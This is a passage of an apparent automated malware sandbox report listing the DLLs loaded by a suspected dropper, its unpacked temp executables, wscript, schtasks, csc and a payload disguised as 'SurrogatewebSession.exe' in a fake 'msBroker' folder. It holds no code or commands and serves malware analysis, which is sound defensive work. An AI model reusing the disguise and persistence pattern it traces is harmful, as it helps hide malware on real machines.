                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: String function: 003307A0 appears 31 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: String function: 00A3FFD0 appears 56 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: String function: 00A407A0 appears 31 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: String function: 00A3FEFC appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: String function: 0073EB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: String function: 0073F5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: String function: 0073EC50 appears 56 times
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: version.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: dxgidebug.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: sfc_os.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: rsaenh.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: dwmapi.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: cryptbase.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: riched20.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: usp10.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: msls31.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: iconcodecservice.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: windowscodecs.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: edputil.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: slc.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: sppc.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: pcacli.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: mpr.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: windows.fileexplorer.common.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: ntshrui.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: cscapi.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Section loaded: linkinfo.dll
                                Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                                Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Section loaded: dxgidebug.dll
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                 Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
